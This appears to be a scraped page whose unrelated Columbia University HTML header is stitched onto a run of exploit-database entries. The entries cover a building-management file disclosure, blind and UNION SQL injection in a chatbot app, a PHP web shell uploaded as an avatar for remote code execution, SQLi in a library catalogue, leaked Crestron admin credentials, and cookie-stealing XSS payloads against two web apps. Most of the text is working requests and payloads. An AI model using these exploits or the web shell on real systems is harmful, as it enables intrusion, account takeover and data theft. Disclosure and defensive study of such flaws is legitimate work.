<!-- 08/28/18, 8:55:54am --><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" >
<meta name="msvalidate.01" content="DB472D6D4C7DB1E74C6D939F9C8AA8B4" />
<title>Columbia University in the City of New York</title>
...
...
# Exploit Title: OpenBMCS 2.4 - Information Disclosure
# Exploit Author: LiquidWorm
# Date: 26/10/2021
OpenBMCS 2.4 Secrets Disclosure
Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4
Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.
Desc: The application allows directory listing and information disclosure of
some sensitive files that can allow an attacker to leverage the disclosed
information and gain full BMS access.
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
Apache/2.4.41 (Ubuntu)
Apache/2.4.25 (Debian)
nginx/1.16.1
PHP/7.4.3
PHP/7.0.33-0+deb9u9
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5695
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php
26.10.2021
--
https://192.168.1.222/debug/
Index of /debug
change_password_sqls
clear_all_watches.php
controllerlog/
dash/
dodgy.php
fix_out.php
graphics/
graphics_diag.php
graphics_ip_diag/
jace_info.php
kits/
mysession.php
nuke.php
obix_test.php
print_tree.php
reboot_backdoor.php
rerunSQLUpdates.php
reset_alarm_trigger_times.php
system/
test_chris_obix.php
timestamp.php
tryEmail.php
trysms.php
unit_testing/
userlog/
...
...
/cache/
/classes/
/config/
/controllers/
/core/
/css/
/display/
/fonts/
/images/
/js/
/php/
/plugins/
/sounds/
/temp/
/tools/
/core/assets/
/core/backup/
/core/crontab/
/core/font/
/core/fonts/
/core/license/
/core/load/
/core/logout/
/core/password/
/php/audit/
/php/phpinfo.php
/php/temp/
/php/templates/
/php/test/
/php/weather/
/plugins/alarms/
/tools/phpmyadmin/index.php
/tools/migrate.php
# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi
# Date: 18/01/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Steps
# Go to : http://127.0.0.1/classes/Master.php?f=get_response
# Save request in BurpSuite
# Run saved request with sqlmap -r sql.txt
======
POST /classes/Master.php?f=get_response HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 73
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
======
#Payloads
#Payload (UNION query)
message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -
#(AND/OR time-based blind)
message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud
# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE)
# Date: 18/01/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Exploit :
You can upload a php shell file as a bot_avatar or user_avatar or image
# ------------------------------------------------------------------------------------------
# POC
# ------------------------------------------------------------------------------------------
# Request sent as base user
POST /classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost.SA
Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474
Content-Length: 1121
Connection: close
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="name"
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="short_name"
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="intro"
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="no_result"
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="img"; filename=""
Content-Type: image/jpeg
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php"
Content-Type: application/octet-stream
<?php
if($_REQUEST['s']) {
system($_REQUEST['s']);
} else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="user_avatar"; filename=""
Content-Type: application/octet-stream
-----------------------------55217074722533208072616276474--
# Response
HTTP/1.1 200 OK
Date: Tue, 18 Jan 2022 00:51:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 119
Connection: close
Content-Type: text/html; charset=UTF-8
1
# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------
GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1
Host: localhost.SA
Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Tue, 18 Jan 2022 00:51:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>0xSaudi
</pre>
# Exploit Title: Nyron 1.0 - SQLi (Unauthenticated)
# Google Dork: inurl:"winlib.aspx"
# Date: 01/18/2021
# Exploit Author: Miguel Santareno
# Vendor Homepage: http://www.wecul.pt/
# Software Link: http://www.wecul.pt/solucoes/bibliotecas/
# Version: < 1.0
# Tested on: windows
# 1. Description
Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter.
# 2. Proof of Concept (PoC)
https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='">
# 3. Research:
https://miguelsantareno.github.io/edp.pdf
# Exploit Title: Creston Web Interface 1.0.0.2159 - Credential Disclosure
# Exploit Author: RedTeam Pentesting GmbH
Advisory: Credential Disclosure in Web Interface of Crestron Device
When the administrative web interface of the Crestron HDMI switcher is
accessed unauthenticated, user credentials are disclosed which are valid
to authenticate to the web interface.
Details
=======
Product: Crestron HD-MD4X2-4K-E
Affected Versions: 1.0.0.2159
Fixed Versions: -
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
Advisory Status: published
CVE: CVE-2022-23178
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178
Introduction
============
"Crestron sets the gold standard for network security by leveraging the
most advanced technologies including 802.1x authentication, AES
encryption, Active Directory® credential management, JITC Certification,
SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to
provide network security at the product level."
(from the vendor's homepage)
More Details
============
Upon visiting the device's web interface using a web browser, a login
form is displayed requiring to enter username and password to
authenticate. The analysis of sent HTTP traffic revealed that in
addition to the loading of the website, a few more HTTP requests are
automatically triggered. One of the associated responses contains a
username and a password which can be used to authenticate as the
affected user.
Proof of Concept
================
Requesting the URL "http://crestron.example.com/" via a web browser
results in multiple HTTP requests being sent. Among others, the
following URL is requested:
------------------------------------------------------------------------
http://crestron.example.com/aj.html?a=devi&_=[...]
------------------------------------------------------------------------
This request results in a response similar to the following:
------------------------------------------------------------------------
HTTP/1.0 200 OK
Cache-Control: no-cache
Content-type: text/html
{
"login_ur": 0,
"front_val": [
0,
1
],
"uname": "admin",
"upassword": "password"
}
------------------------------------------------------------------------
The values for the keys "uname" and "upassword" could be used to
successfully authenticate to the web interface as the affected user.
Workaround
==========
Reachability over the network can be restricted for access to the web
interface, for example by using a firewall.
Fix
===
No fix known.
Security Risk
=============
As user credentials are disclosed to visitors of the web interface they
can directly be used to authenticate to it. The access allows to modify
the device's input and output settings as well as to upload and install
new firmware. Due to ease of exploitation and gain of administrative
access this vulnerability poses a high risk.
Timeline
========
2021-10-06 Vulnerability identified
2021-11-15 Customer approved disclosure to vendor
2021-12-08 Vendor notified
2021-12-15 Vendor notified again
2021-12-21 Vendor response received: "The device in question doesn't support
Crestron's security practices. We recommend the HD-MD-4KZ alternative."
2021-12-22 Requested confirmation, that the vulnerability will not be addressed.
2021-12-28 Vendor confirms that the vulnerability will not be corrected.
2022-01-12 Advisory released
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
# Exploit Title: Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)
# Exploit Author: Vulnerability-Lab
# Date: 29/12/2021
Document Title:
===============
Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2305
Release Date:
=============
2021-12-29
Vulnerability Laboratory ID (VL-ID):
====================================
2305
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Rocket LMS is an online course marketplace with a pile of features that helps you to run your online education business easily.
This product helps instructors and students to get in touch together and share knowledge. Instructors will be able to create
unlimited video courses, live classes, text courses, projects, quizzes, files, etc and students will be able to use the
educational material and increase their skill level. Rocket LMS is based on real business needs, cultural differences,
advanced user researches so the product covers your business requirements efficiently.
(Copy of the Homepage:https://lms.rocket-soft.org/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the Rocket LMS v1.1 cms.
Affected Product(s):
====================
Rocketsoft
Product: Rocket LMS v1.1 - eLearning Platform CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-12-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Rocket LMS v1.1 cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The vulnerability is located in the support ticket message body. The message body does not sanitize the input of message.
Remote attackers with low privileged application user accounts are able to inject own malicious script code with persistent
attack vector. The request method to inject is post. After the inject the message a displayed again for the user and the
backend for the support (admin). The issue can be exploited by organization, student and instructor account roles.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] conversations Support - New Ticket
Vulnerable Input(s):
[+] Subject
Vulnerable Parameter(s):
[+] title
Affected Module(s):
[+] Messages History
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
<img src="evil.source" onload="alert(document.domain)"></img>
--- PoC Session Logs (POST) ---
https://lms.rocket-soft.org/panel/support/store
Host: lms.rocket-soft.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
Origin:https://lms.rocket-soft.org
Connection: keep-alive
Referer:https://lms.rocket-soft.org/panel/support/new
Cookie: webinar_session=eyJpdiI6ImNUeG9hcmFEbXFUSGxZd0NOZ3J6R0E9PSIsInZhbHVlIjoiWXFSOGRXYWFHcUUvc0VuNUpzanhBZjdBc21lRy8xaEhTU0hQTnk2YWlJM1ZHYkxXdzc3
T3U2Nm9yMEI3b2o2QmtCT2NjdEkyRVNwdlhWUjgwY0ZHWkNyVHJSdnBCck8vVWo4MFVsK2JvLzRDUm1BRm5zU2Y0SWZWdGR1b29keWwiLCJtYWMiOiIxODI3NDQ2OTcxZDMwNjA0M2U0
OGM3YzZmNmMzM2Y1OTk5ZTNiZTIzY2E2ZGQxMTlkYzY2YzY0Y2M5OTI5MTc5In0%3D; TawkConnectionTime=0; __tawkuuid=e::lms.rocket-soft.org::W9t6jOO76CukDtw
wAughTc4sTzqsd2xAqZJpiyabjsp3sI9le/SuCBxWz7ekNzR0::2; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6Ik9iUEZFNlZBYjJSOEVjSE1hRlNiZFE9PSIsInZhbHVlIjoiR3F1RWFsb01KREQ2K05FaG5MT1hST1
pYNmx3Z3ZoU2lDOXBQL3h3aVg0T2k2a1YwVDZYR25nUnNCOXhsWjZnWjcrQTJxUzhEa3k2N1VEdjZkZGJFMXg3Q0pIWGx6VUZwajJGc09DdUlzaFpwb0t2SHJoaHkvQmh3bTJPM0RlWVh
SRGszUlRqUVJNdlErMXpXYU5hZWlySWVrMktwZmp4RzNMSXV2TnAzTlFpQUhRalNKSmw2elhzVURqWVpqQlpkajAvUzBPcTV0Z0tXaFRFNkpmLy94TkFxa3dxdjlnOWk4VWpSRzMzeUVa
UT0iLCJtYWMiOiJkMmQ3ZTk4NzllOTQ3ZTU4ZGRjMTljMjlkMzRkODhjMmI0Mzk5MjM1ZmJlYTc1NTAxYzI2OGI3YmMwMDczMmQxIn0%3D
_token=3CmMP45TwUNoeNVPzZ4JuGunKoFqcUxbDWliz9rg&title=test1"><img src="evil.source" onload=alert(document.domain)></img>&type=course_support&webinar_id=1996&message=test2&attach=
-
POST: HTTP/1.1 302 Found
Server: Apache/2
X-Powered-By: PHP/7.4.20
Location:https://lms.rocket-soft.org/panel/support
Set-Cookie:
webinar_session=eyJpdiI6Im5OVER1cno1OXJmQnRRb3QycHExN1E9PSIsInZhbHVlIjoiOGxXdHV5em95bGh0ejh3MXlRT3dwSXFGcUZzSmMzbHlJd2xFRDhweEFBS25JeFFrMzF2Wn
lLdHc0MUpFQmN1cDY3SUE1V0hwVGRDUGZvRkRYZVYvY01BZ2NxT1NJWThXQnRiNnR3SDJ4TEZ5Q3BQUnZhR1lxUHZnR2hhLzEzSysiLCJtYWMiOiI1YjBlMmVjMjYwYjEzODVhZTJmZWZj
YTlmMGJjMThkYzQ0ZjVmNjI0NTA1MGMxM2Q3ZGVlYjlhOGJkZTY3NmM0In0%3D; Max-Age=7200; path=/; httponly; samesite=lax
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: origin, x-requested-with, content-type
Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS
Content-Length: 210
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vulnerable Source: conversations Support - New Ticket - Messages History
<div class="rounded-sm mt-15 border panel-shadow p-15">
<div class="d-flex align-items-center justify-content-between pb-20 border-bottom border-gray300">
<div class="user-inline-avatar d-flex align-items-center">
<div class="avatar">
<img src="/store/995/60dce9eb4290c.png" class="img-cover" alt="">
</div>
<div class="ml-10">
<span class="d-block text-dark-blue font-14 font-weight-500">Cameron Schofield</span>
<span class="mt-1 font-12 text-gray d-block">user</span>
</div></div>
<div class="d-flex flex-column align-items-end">
<span class="font-12 text-gray">2021 Sep 9 | 12:58</span>
</div></div>
<p class="text-gray mt-15 font-weight-500 font-14">"<img src="evil.source" onload="alert(document.domain)"></img></p>
</div>
Reference(s):
https://lms.rocket-soft.org/
https://lms.rocket-soft.org/panel/
https://lms.rocket-soft.org/panel/support
https://lms.rocket-soft.org/panel/support/new
https://lms.rocket-soft.org/panel/support/[id]/conversations
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
# Exploit Title: uDoctorAppointment v2.1.1 - 'Multiple' Cross Site Scripting (XSS)
# Exploit Author: Vulnerability-Lab
# Date: 15/12/2021
Document Title:
===============
uDoctorAppointment v2.1.1 - Multiple XSS Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2288
Release Date:
=============
2021-12-15
Vulnerability Laboratory ID (VL-ID):
====================================
2288
Common Vulnerability Scoring System:
====================================
5
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Clinic management, doctor or therapist online medical appointment scheduling system for the management of health care.
uDoctorAppointment script allows doctors to register and appropriate membership plan with different features.
Patients can view doctor profiles before booking appointments. The site administrator or doctor may create and
manage advanced schedules, create working time slots for each day of the week, define time off etc.
(Copy of the Homepage:https://www.apphp.com/codemarket/items/1/udoctorappointment-php-script )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uDoctorAppointment script web-application.
Affected Product(s):
====================
ApPHP
Product: uDoctorAppointment v2.1.1 - Health Care Script (PHP) (Web-Application)
Product: ApPHP MVC Framework v1.1.5 (Framework)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-10: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-12-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple non-persistent cross site vulnerabilities has been discovered in the official uDoctorAppointment v2.1.1 script web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser
to web-application requests from the client-side.
The cross site security web vulnerabilities are located in the `created_at`, `created_date` and `sent_at` parameters of the `filter` web module.
The injection point is located in the parameters and the execution occurs in the filter module. The request method to inject the malicious script
code is GET and the attack vector of the vulnerability is non-persistent on client-side.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] ./doctorReviews/doctorReviews
[+] ./orders/orders
[+] /mailingLog/manage
[+] /orders/doctorsManage
[+] /news/manage
[+] /newsSubscribers/manage
[+] /doctorReviews/manage/status/approved
[+] /appointments/manage
Vulnerable Parameter(s):
[+] created_at
[+] created_date
[+] sent_at
[+] appointment_date
Affected Module(s):
[+] Filter
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
">%20<img%20src="evil.source"%20onload=alert(document.domain)></img>
Role: Patient (Frontend - created_at)
https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=2021-09-08&but_filter=Filter
-
https://doctor-appointment.localhost:8080/doctorReviews/doctorReviews?patient_name=test&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
Role: Doctor (Frontend - created_date)
https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=2021-09-08&status=2&but_filter=Filter
-
https://doctor-appointment.localhost:8080/orders/orders?order_number=test&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=2&but_filter=Filter
Role: Admin (Backend -
https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=2021-09-01&status=0&but_filter=Filter
https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter
https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=2021-09-01&but_filter=Filter
https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=2021-09-01&but_filter=Filter
https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=2021-09-01&but_filter=Filter
https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=2021-09-01&but_filter=Filter
https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=2021-09-01&doctor_id=1&status=1&but_filter=Filter
-
https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=test1&email_content=test2&email_from=test3&email_to=test4&sent_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&status=0&but_filter=Filter
https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter
https://doctor-appointment.localhost:8080/news/manage?news_header=test1&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
https://doctor-appointment.localhost:8080/newsSubscribers/manage?first_name=test1&last_name=test2&email=test%40aol.com&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
https://doctor-appointment.localhost:8080/doctorReviews/manage/status/approved?doctor_first_name%2Cdoctor_last_name=test1&patient_name=test2&created_at=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
https://doctor-appointment.localhost:8080/appointments/manage?appointment_number=test1&patient_first_name%2Cpatient_last_name=test2&doctor_first_name%2Cdoctor_last_name=test3&appointment_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&but_filter=Filter
https://doctor-appointment.localhost:8080/orders/doctorsManage?order_number=test1&created_date=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E&doctor_id=1&status=1&but_filter=Filter
Vulnerable Source: ./mailingLog
<div class="filtering-wrapper">
<form id="frmFilterMailingLog" action="mailingLog/manage" method="get">
Subject: <input id="email_subject" style="width:140px;" maxlength="125" type="text" value="a" name="email_subject">
Content: <input id="email_content" style="width:140px;" maxlength="125" type="text" value="b" name="email_content">
From: <input id="email_from" style="width:130px;" maxlength="125" type="text" value="c" name="email_from">
To: <input id="email_to" style="width:130px;" maxlength="125" type="text" value="d" name="email_to">
Date Sent: <input id="sent_at" maxlength="255" style="width:80px;"
type="text" value=">" <img="" src="evil.source" onload="alert(document.cookie)" [MALICIOUS EXECUTABLE SCRIPT CODE PAYLOAD!] class="hasDatepicker">
<img class="ui-datepicker-trigger" src="assets/vendors/jquery/images/calendar.png" alt="..." title="...">
" name="sent_at" />Status: <select id="status" style="width: 90px; padding: 10px; display: none;" name="status" class="chosen-select-filter">
<option value="" selected="selected">--</option>
<option value="0">Not Sent</option>
<option value="1">Sent</option>
</select><div class="chosen-container chosen-container-single chosen-container-single-nosearch" style="width: 90px;" title="" id="status_chosen">
<a class="chosen-single" tabindex="-1"><span>--</span><div><b></b></div></a><div class="chosen-drop"><div class="chosen-search">
<input type="text" autocomplete="off" readonly="" maxlength="255"></div><ul class="chosen-results"></ul></div></div>
<div class="buttons-wrapper">
<input name="" class="button white" onclick="jQuery(location).attr('href','https://doctor-appointment.localhost:8080/mailingLog/manage');" type="button" value="Cancel">
<input name="but_filter" type="submit" value="Filter">
</div></form></div>
--- PoC Session Logs (GET) ---
https://doctor-appointment.localhost:8080/mailingLog/manage?email_subject=a&email_content=b&email_from=c&email_to=d&sent_at=>"<img+src%3D"evil.source"+onload%3Dalert(document.cookie)>++&status=&but_filter=Filter
Host: doctor-appointment.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: isOpened=menu-04; apphp_9tmmw0krko=g2234alc8h8ks3ms2nsbp4tsa9
-
GET: HTTP/1.1 200 OK
Server: Apache
Content-Length: 2914
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Reference(s):
https://doctor-appointment.localhost:8080/
https://doctor-appointment.localhost:8080/mailingLog/
https://doctor-appointment.localhost:8080/news/manage
https://doctor-appointment.localhost:8080/order/manage
https://doctor-appointment.localhost:8080/mailingLog/manage
https://doctor-appointment.localhost:8080/appointments/manage
https://doctor-appointment.localhost:8080/orders/doctorsManage
https://doctor-appointment.localhost:8080/newsSubscribers/manage
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by a filter or secure encode of the vulnerable created_date, appointment_date, sent_at and create_at parameters.
Disallow the usage of special chars in the affected parameters on get method requests.
Sansitize the vulnerable output location to resolve the point of execution in the filter module.
Credits & Authors:
==================
Vulnerability-Lab [RESEARCH TEAM] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
